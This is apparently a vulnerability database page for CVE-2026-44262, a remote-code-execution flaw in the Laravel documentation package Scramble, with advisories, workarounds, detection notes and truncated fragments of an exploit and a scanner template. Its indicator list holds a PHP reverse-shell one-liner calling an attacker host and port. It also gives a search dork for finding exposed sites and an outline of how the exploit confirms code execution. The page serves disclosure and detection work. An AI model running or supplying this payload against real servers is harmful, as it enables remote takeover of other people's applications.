CVE-2026-44262
Published 2026-05-12
Priority P2 (76) · critical · CVSS 3.1 base score 9.4
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
Exploit available · EPSS 5.86% (92.3rd percentile)
Scramble generates API documentation for Laravel project. From 0.13.2 to before 0.13.22, when documentation endpoints are publicly accessible and validation rules reference user-controlled input, request supplied data may be evaluated during documentation generation, leading to execution of arbitrary PHP code in the application context. This vulnerability is fixed in 0.13.22.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dedoc | scramble | — | — |
| dedoc | scramble | >= 0.13.2 < 0.13.22 | 0.13.22 |
Detection & IOCs (extracted from sources)
- command: `$s=@fsockopen('{lhost}',{lport},$e,$m,30);if(!$s)return;$p=proc_open({shell},array(0=>$s,1=>$s,2=>$s),$pipes);if($p)proc_close($p);fclose($s);`
- Monitor HTTP requests to /docs/api.json containing PHP function names in query parameters (sleep, shell_exec, print, file_get_contents, fsockopen, proc_open); these are injected as Laravel validation rule defaults to trigger RCE.
- The exploit identifies vulnerable parameters by checking OpenAPI spec query parameter 'default' values that match Laravel validation rule keywords or contain '|'; defenders should audit /docs/api.json schema defaults for user-controlled input reflected as validation rules.
- The exploit checks for a 200 HTTP response and the presence of '"paths"' in the body to confirm the docs endpoint is publicly accessible; alert on unauthenticated access to /docs/api.json returning 200 with a JSON body containing 'paths'.
- Timing-based detection: the exploit sends a sleep() payload and treats a response delay of at least 75% of the sleep duration as confirmation of RCE; monitor for anomalously slow responses on /docs/api.json.
- Exploit output capture works by reading content appearing before the first '{' character in the JSON response body: PHP print/echo output from injected code leaks before the JSON structure begins.
- Google dork for exposed vulnerable instances: inurl:/docs/api.json "dedoc/scramble"
- The vulnerability only exists when the /docs/api.json endpoint is publicly accessible (unauthenticated). Restricting access via middleware eliminates the attack surface without patching.
VulDB
dedoc scramble up to 0.13.21 code injection
vuldb·2026-05-12
CVE-2026-44262 [CRITICAL] dedoc scramble up to 0.13.21 code injection
A vulnerability classified as critical has been found in dedoc scramble up to 0.13.21. This issue affects some unknown processing. Performing a manipulation results in code injection.
This vulnerability is identified as CVE-2026-44262. The attack can be initiated remotely. There is not any exploit available.
It is recommended to upgrade the affected component.
GHSA
Scramble vulnerable to remote code execution via evaluation of user-controlled input in validation rules
ghsa·2026-05-06
CVE-2026-44262 [CRITICAL] CWE-94 Scramble vulnerable to remote code execution via evaluation of user-controlled input in validation rules
### Impact
A remote code execution (RCE) vulnerability affects versions `0.13.2` through `0.13.21`. When documentation endpoints are publicly accessible and validation rules reference user-controlled input, request supplied data may be evaluated during documentation generation, leading to execution of arbitrary PHP code in the application context.
### Patches
Fixed in version `0.13.22`.
### Workarounds
If upgrading is not immediately possible:
* Restrict access to documentation endpoints (`/docs/api`, `/docs/api.json`)
* Avoid using user-controlled variables inside validation rule expressions (e.g., values derived from request input)
* Disable documentation endpoints in production
No detection rules found.
Exploit-DB
scramble - Remote Code Execution
exploitdb·2026-05-27·CVSS 9.4
CVE-2026-44262 [CRITICAL] scramble - Remote Code Execution
---
```python
# Exploit Title: scramble - Remote Code Execution
# Google Dork: inurl:/docs/api.json "dedoc/scramble"
# Date: 2026-05-07
# Exploit Author: Joshua van der Poll (https://github.com/joshuavanderpoll)
# Vendor Homepage: https://scramble.dedoc.co
# Software Link: https://github.com/dedoc/scramble
# Version: >=0.13.2, <0.13.22
# (the listing between this header and the following function body, including the
#  function's own header ending in "-> str:", was lost in extraction)
    if not target.startswith(("http://", "https://")):
        target = "http://" + target
    return target.rstrip("/")


def print_cookie_findings(cookies: list[str]):
    for raw in cookies:
        name = raw.split("=")[0].strip()
        value_part = raw.split("=", 1)[1].split(";")[0].strip() if "=" in raw else ""
        if name.upper() == "XSRF-TOKEN":
            info(f"CSRF token (XSRF-TOKEN): {G}{value_part}{X}")
        elif "session" in name.lower():
            info(f"Session cookie '{name}': {G}{v
```
(listing truncated here in the indexed copy)
Nuclei
Scramble Laravel - Remote Code Execution
nuclei·CVSS 9.4
CVE-2026-44262 [CRITICAL] Scramble Laravel - Remote Code Execution
Scramble for Laravel >= 0.13.2 and < 0.13.22 (the rest of the description and most of the template body were lost in extraction; only the tail of the matcher block survives)
```yaml
          - "… >= 8"
          - "status_code == 200"
        condition: and
# digest: 4a0a0047304502201b8b3b4fae7a97422be0b91e5922323fb96f24f334486f59e782553fba200bf9022100c31bc7a90c9eac8f1d2b852398aef15db8e47c521dda812048ce0c95fd484e0e:922c64590222798bb761d5b6d8e72950
```
No writeups or analysis indexed.